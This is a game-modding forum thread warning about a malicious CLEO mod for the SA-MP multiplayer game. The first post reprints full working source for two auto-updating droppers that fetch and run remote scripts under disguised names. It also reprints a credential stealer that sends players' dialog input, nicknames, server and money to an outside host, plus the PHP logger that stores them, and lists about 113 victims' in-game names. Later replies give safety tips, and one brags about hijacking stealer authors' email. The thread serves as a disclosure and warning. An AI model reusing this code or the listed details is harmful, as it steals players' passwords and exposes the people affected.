Intriguing scam (check if your data was stolen)

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
151
[video=youtube]https://www.youtube.com/watch?v=dNTbpmnWZU0[/video]


Code:
0000:
 
const 
    SCRIPT_VERSION = 1
 
    UPDATEINFO_FILE = "cleo_name_update.txt"
    CHANGELOG_FILE = "cleo_name_changelog.txt"
end
 
repeat
    wait 3000
until 0AFA:  is_samp_available
 
wait 0
 
0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION
 
while true
    wait 0
end
 
:download_check_status 

1@ = -1
while 1@ == -1 
    wait 0
    0C66: 1@ = get_download 0@ state 
end
0AB2: ret 1 1@ // 
 
:url_fileupdateinfo // 
// 
hex
    "http:" "/" "/" "rvankarus.esy.es/cleo/update.txt" 00
end
 
:check_updates
// call 
0AC6: 1@ = label @url_fileupdateinfo offset // 
0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // 
0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@
0C7D: release_download 1@ // 
 
if 2@ <> 0 // 
then
    wait 0
else // ?????
    wait 0
 
    if 0AAB: file_exists UPDATEINFO_FILE // 
    then
        0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // 
        if 001D: 3@ > 0@ // 
        then
            wait 0
 
            0AC8: 4@ = allocate_memory_size 260 // 
            0C11: memset destination 4@ value 0 size 260 // 
 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // 
            0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 
            0C7D: release_download 1@ //
 
            if 2@ == 0
            then
                wait 0
 
            end
 
            // -------
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script_url" //
            0C65: 1@ = download_url 4@ to_file "cleo/FileSystem.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "FileSystem.cs"

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: 1@ = download_url 4@ to_file "cleo/animbot4.cs" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "animbot4.cs"

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data1" //
            0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data1.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
            
            // -------
            0C11: memset destination 4@ value 0 size 260 // 
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data2" //
            0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data2.txt" // 
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //

            if 2@ == 0
            then
            wait 0
            else
                wait 0
            end
 
            0AC9: free_allocated_memory 4@
        end
    end
end
0AB2: ret 0
 
:show_changelog // 
if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // 
then
    0AC8: 1@ = allocate_memory_size 96 // 
    0C11: memset destination 1@ value 0 size 96
 
    0A9C: 2@ = file 0@ size // 
    2@++ 
 
    0AC8: 4@ = allocate_memory_size 2@ // 
    0C11: memset destination 4@ value 0 size 2@
    repeat     
        0AD7: read_string_from_file 0@ to 1@ size 95
        0C17: 3@ = strlen 1@
        if 3@ > 0
        then
            0C15: strcat destination 4@ source 1@ // 
        end
    until 0AD6: end_of_file 0@ reached
 
    0B3B: samp show_dialog id 335 caption "{FFFFFF}Daniel Nguyen" text 4@ button_1 "Closed" button_2 "" style 0 // 
 
    0AC9: free_allocated_memory 4@ // 
    
    0AC9: free_allocated_memory 1@ // 
    0A9B: closefile 0@ // ????????? ????              
end
0AB2: ret 0


Code:
0000:

const 
    SCRIPT_VERSION = 1

    UPDATEINFO_FILE = "data\Decision\chris\cleo_name_update.txt"
    CHANGELOG_FILE = "data\Decision\chris\cleo_name_changelog.txt"
    DELTA_1 = "data\Decision\chris\delta.txt"
    NAVY_1 = "data\Decision\chris\navy.txt"
    HUMAN_1 = "data\Decision\chris\human.txt"
    AIR_1 = "data\Decision\chris\air.txt"
    COMMAN_1 = "data\Decision\chris\comman.txt" 
    SECU_1 = "data\Decision\chris\secu.txt" 
end

repeat
    wait 5000
    until 0B61:  samp is_local_player_spawned



0AF8: samp add_message_to_chat "" color -1

0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION

while true
    wait 0
end

:download_check_status 
// call @download_check_status 1 download_n 0@
1@ = -1
while 1@ == -1 
    wait 0
    0C66: 1@ = get_download 0@ state /
end
0AB2: ret 1 1@ 

:url_fileupdateinfo 
//  URL 
hex
    "http:" "/" "/" "rvankarus1.pe.hu/cleo/update.txt" 00
end

:check_updates
// call @check_updates 1 current_version 0@
0AC6: 1@ = label @url_fileupdateinfo offset // ??????? ?????? ? ????????????? ??????????
0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // ???????? ?????????? ?????
0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@
0C7D: release_download 1@ // ???????????, ?.?. ?????????? ?????????

if 2@ <> 0 // ???? ?????? ?? ????? 0(?.?. ???????? ????????? ????????), ??
then
     Marker.Disable(7@)
else // ?????
     Marker.Disable(7@)

    if 0AAB: file_exists UPDATEINFO_FILE // ???? ?? ???? ?? ??? ?????? ? ??????????? ??? ?????, ???????? ??? ?? ?????? ??????
    then
        0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // ?????? ????? ?????? ? ????????? ????? ??????????
        if 001D: 3@ > 0@ // ???? ??????? ?????? ??????? ??????, ??? ????????? ? ????? ??????????, ??
        then
             Marker.Disable(7@)

            0AC8: 4@ = allocate_memory_size 260 // ???????? ?????? ??? URL ???????? ?????
            0C11: memset destination 4@ value 0 size 260 // ??????? ?? ???????? ????????(?? ?????? ??????)

            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // ?????? URL ???????? ?????? ?????????
            0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // ????????? ?????? ?????????
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // ???? ????????? ????????
            0C7D: release_download 1@ //


            // -------
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script2" //
            0C65: 1@ = download_url 4@ to_file "cleo/anticrash-1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "anticrash-1.cs"


            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
             // -------
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //
            0C65: 1@ = download_url 4@ to_file "cleo/FileSystemOperations.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            
            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
             // -------
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script3" //
            0C65: 1@ = download_url 4@ to_file "cleo/Systemcode.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "systemcode.cs"
            
            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
             // -------
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script4" //
            0C65: 1@ = download_url 4@ to_file "cleo/backupp1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "backupp1.cs"
            
            
            if 2@ == 0
            then
                Marker.Disable(7@)
            else
                Marker.Disable(7@)
            end
            
            
             // -------
            0C11: memset destination 4@ value 0 size 260 //
            0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script5" //
            0C65: 1@ = download_url 4@ to_file "cleo/backupp2.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????
            0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //
            0C7D: release_download 1@ //
            0A92: create_custom_thread "backupp2.cs"
            
            
            
            
            


            0AC9: free_allocated_memory 4@
        end
    end
end
0AB2: ret 0

:show_changelog // ????????? ??????? ??? ?????? ?????? ?????????
if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // ????????? ???? ??? ??????
then
    0AC8: 1@ = allocate_memory_size 96 // ???????? ?????? ??? ?????? ?? ?????
    0C11: memset destination 1@ value 0 size 96

    0A9C: 2@ = file 0@ size // ???????? ?????? ?????
    2@++ // ????????? ?????? - ???????

    0AC8: 4@ = allocate_memory_size 2@ // ???????? ?????? ??? ?????? ?????????
    0C11: memset destination 4@ value 0 size 2@
    repeat     
        0AD7: read_string_from_file 0@ to 1@ size 95
        0C17: 3@ = strlen 1@
        if 3@ > 0
        then
            0C15: strcat destination 4@ source 1@ // ??????????? ?????? ?? ????? ? ????? ?? ??????? ?????????
        end
    until 0AD6: end_of_file 0@ reached

    0B3B: samp show_dialog id 335 caption "{66CC00}San Andreas Armed Service" text 4@ button_1 "10-4" button_2 "" style 0 // ?????????? ??????

    0AC9: free_allocated_memory 4@ // ????? ?? ????????????

    0AC9: free_allocated_memory 1@ //
    0A9B: closefile 0@ // ????????? ????              
end
0AB2: ret 0

Code:
<?php  
  $f = fopen("Readme.HTML", "a");  
  $s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />";  
  fwrite($f, $s);  
  fclose($f);  
  ?>

//--------------------------------------------------------------------------------------------------------------------------------------------------------
}
{$CLEO}
thread 'NoName'
While 8afa:
wait 100
end   
While 8B4C: -1
wait 100
end
While 0B4C: -1
wait 0
0B4E: samp 0@ = get_current_dialog_id
0AC8: 6@ = 64
repeat
wait 0
0B4A: samp 6@ = get_current_dialog_editbox_text
until 8B4C: -1  
0AC8: 1@ = 24
0B2B: 2@ = $PLAYER_ACTOR
0B36: samp 1@ = get_player_nickname 2@
wait 500
010B: 2@ = player $PLAYER_CHAR money
0AC8: 3@ = 15
0B39: samp get_current_server_address 3@ port 4@
0AC8: 5@ = 86
0B3A: samp 5@ = get_current_server_name
0C17: 10@ = strlen 6@
if 10@ > 1
    then  
    0AC8: 8@ = 445       
    0AD3: 8@ = format "http:%c%crvankarus.esy.es%ccleo%cadd.php?nick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d" params 47 47 47 47 1@ 3@ 4@ 5@ 0@ 6@ 2@ // ñá â êîâû÷êàõ íåëüçÿ ïèñàòü ñëåøü, ïîýòìó òàì ãäå äîëæíà áûòü ñëåøü ñòîèò %c - çíàê çàïèñàíûé â ïàðàìåòðàõ.  ïàðàìåòðàõ äëÿ êàæäîé %c ïðîïèñàí 47 - ýòî íîìåð ñëåøà. Ñòàíäàðòíî ñòîèò àäðåñ http://stilloger.ph/stealer/add.php?[äàëåå äàííûå], òàê êàê ñá íå ëþáèò ñëåøü â êîâû÷êàõ, òî àäðåñ çàïèñàí òàê http:%c%cstilloger.ph%cstealer%cadd.php?[äàëåå äàííûå]
    0AA2: 9@ = load_library "urlmon.dll" // IF and SET
    0AA4: 7@ = get_proc_address "URLDownloadToFileA" library 9@ // IF and SET     
    0AA5: call 7@ num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "%TEMP%\2352sfe.tmp" szUrl 8@ caller 0  
    0AA3: 9@  
    0AC9: 8@
    end
0AC9: 1@
0AC9: 3@
0AC9: 5@
0AC9: 6@
wait 500 
end     
0@ = 0
1@ = 0
2@ = 0
3@ = 0
4@ = 0
5@ = 0
6@ = 0
7@ = 0
8@ = 0
9@ = 0 
10@ = 0
30@ = 0
31@ = 0
wait 1000
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread
0A93: end_custom_thread


some nice names for malware:
-FileSystem.cs (downloaded from http://rvankarus.esy.es/cleo/steal.cs xD)
-backup2.cs
-anticrash-1
-systemcode.cs
-backupp1.cs
-backupp2.cs


113 players data stolen within 3 days


Admin_Rgame
Anti_Hack
Bari_Whatameal
Be_Heo
Bem_Mes
BesT_Jay
Best_Jay
Black_Sat
Black_Tammmmm
Black_Tamq
Black_Tanker
Black_hero
Black_herobe
Carry_GumBall
Cet_Nhox
Chinh_Ho
CoCo_Chopper
Con_Bord
Cotex_Huong
DCS_Thuan
Daniel_Elxotia
David_BonNhox
David_Mimi
Demon_Loko
Denis_Kolavov
DepZaiii
Desi_Hem
Destroyer_Nhan
Dinh.Hoang_Tan
Doug_Las
Douglas_Spatacus
Douglas_Stacus
Fed_Ded
Fin_Balor
HOANG_LXAG
HackOf_War
HellenS_SaraS
HoPham_TuanKiet
Hoan_Star
Hoang_guyto
Hoangg_Longg
Hoangg_Tann
Huan_Slatus
Huy_Per
Jay_Jay
Jean_my
Karry_GumBall
Kea_Rez
Kenji_William
Kich_Hoat
Killer_Death
Killer_Deathh
Killer_death
Killerr_Death
Killerr_Deathh
Martin_Geo
Master_Gaistr
Master_Sver
Med_Die
Men_Len
Minh_Hieu
NguyenVan_Hoang
Nhan_KDE
Nhan_KDEE
Niko_graviss
Oni_Baka
PhamTruong_Quoc
Phong_Le
Phuc.Nguyen
Phuc_Nguyen
Phuc_Nguyena
Pick_Daxuo
Play_Boyzzzz
Pro_Game
PurceIl_Bellamy
Purcell_Bellamy
Purcell_Bellamys
Quang_Thai
Rens_Shin
Roy_Race
San_Haden
San_haden
Skin_Sasuke
Skin_sasuke
Tan_Dubai
Tan_Nguyen
Tend_DSd
Tes_Ts
Thanh_Thuan
Thien_Tan
Thinh_Dizz
Tim_Lim
Timds_Ties
Trum_BizSung
Trum_Hanh
Trum_TeamNgua
Trum_TeamNhua
Viperr
Viperrr
Viperrrr
Vua_Zeuss
Willam_Teds
Willam_pro
You_Mother
[VN]_HuyPArker
[VN]_HuyParker
hidan_shine
killer_Death
kingbesst
kingbest
skin_sasuke
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
151
essentially it's a credentials stealer, it uploads something like this:
Name: Douglas_Spatacus | Sever: 163.44.206.243:7777 | Server: [VcG] Vietnamese Community GTA | Dialog: 50 | Password: | | Money: 142907377 |IP: 00.000.000.00 | Time: [2017/07/02 - 18:30:06]

But it has auto updates and created cleo files that are not hosted on his server now so it's difficult to say what exactly it did or what exactly it will do in future, it could to anything
 

0BE4

Active member
Joined
Jan 15, 2017
Messages
124
Reaction score
2
nice warning, tho i think admins here check if each .cs is clean... right admins (Not sure i just think i heard that before from springfield(aka if you are reading this springfield and you don't remember shit you can just pm me and i'll remove this part) but MAYBE i am just saying MAYBE they just throw shit)? but there are many people here who download anything from anywhere without decompiling it...

Psst. LOL this comment doesn't even give a single useful statement it's just a pile of maybes xD

If you are too lazy to read: Good thing there is actually a living human who doesn't get too lazy to warn others...

useful tips:
there is a good anti stealer(Never actually made a stealer to test it)...
.exe's are mostly very unsafe you can absolutely hide ANYTHING even a rat if you want...
Never download anything that says: write your name and delete it why? because it's simply a keylogger just because they can't log your name they ask you to type it so that they get
it logged
Never download anything that says "exploit" in it which asks you for a specific server and a specific amount of money why you may ask? NO exploit in this world asks for a specific
amount of money unless the value is VERY specific...
try virustotal.com results aren't too accurate (I made an entire goddamn rat that doesn't even get detected)
Decompile every cleo you have and every cleo you will download... if it's encrypted better never touch it
if you don't know how to understand code spam springfield (Just kidding)
it's just about simple instructions you can read cleo viruses and shit never looks like a simple set car position cleo

Sorry there is no a lazy version...
 

Zin

Expert
Joined
Aug 1, 2013
Messages
1,690
Reaction score
104
Actually there is a lazy version.

http://ugbase.eu/Thread-IMPORTANT-Informations-regarding-CLEO-Keyloggers?highlight=%28IMPORTANT%29+Informations+regarding+CLEO+Keyloggers
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
151
The video and the mod has been shared and probably made by "Daniel Nguyen", who deleted it, created a new account on UGBASE "ParkCant" and UGBASE discord "Tose_Khovor", trying to convince me to delete the source code because:

6HdMweA.png


EI9Lbj0.png

He wrote to himself using alternative fb account, made 2 accounts (ugbase + discord) to pretend he's worrying about people making malware, potentially made few "shit-posts" just to increase his credibility (and move this thread away from the latest topics), said that someone in his group shared it and said it was "anti-crash", he posted 2 images of it, 1st showing the post, 2nd showing members of that group (he probably doesn't know that the first displayed person of the group is the owner of the account xD)

[img=200x200]http://cdn-static.denofgeek.com/sites/denofgeek/files/styles/main_wide/public/2017/01/sherlock_holmes.jpg?itok=rWgQ454n[/img]
 

monday

Expert
Joined
Jun 23, 2014
Messages
1,125
Reaction score
151
Edit: Now he made "KerbalSpace" account and spams the same way lol
 

0BE4

Active member
Joined
Jan 15, 2017
Messages
124
Reaction score
2
xD ... i was once sent to one of these but it was .exe it used to simply get the data and send it via email to the noob... So i disassembled it AND just by using the very basics i was able to access his email .... xD Yeah trust me it's VERY easy to get it if the guy is too noob(Don't worry they are mostly are)... maybe i'll do a thread on how to get emails and passwords from noobs sending stealers and shit... Now i enjoy these "Stealers" a bit too much xD
 

TeRmminaTo[R]

Active member
Joined
Dec 6, 2016
Messages
53
Reaction score
1
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)
 

WaTTi

Well-known member
Joined
Jan 4, 2015
Messages
260
Reaction score
8
TeRmminaTo[R] said:
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)

WHY YOU WANT DOWNLOAD AND USE A FUCKING DATA STEALER. :-/
 

TeRmminaTo[R]

Active member
Joined
Dec 6, 2016
Messages
53
Reaction score
1
WaTTi said:
TeRmminaTo[R] said:
can someone tell me how this work i dont understand :/ ( can someone give me a link to download it full xD)

WHY YOU WANT DOWNLOAD AND USE A FUCKING DATA STEALER. :-/

I just need it  :areyoukiddingme:
 
Top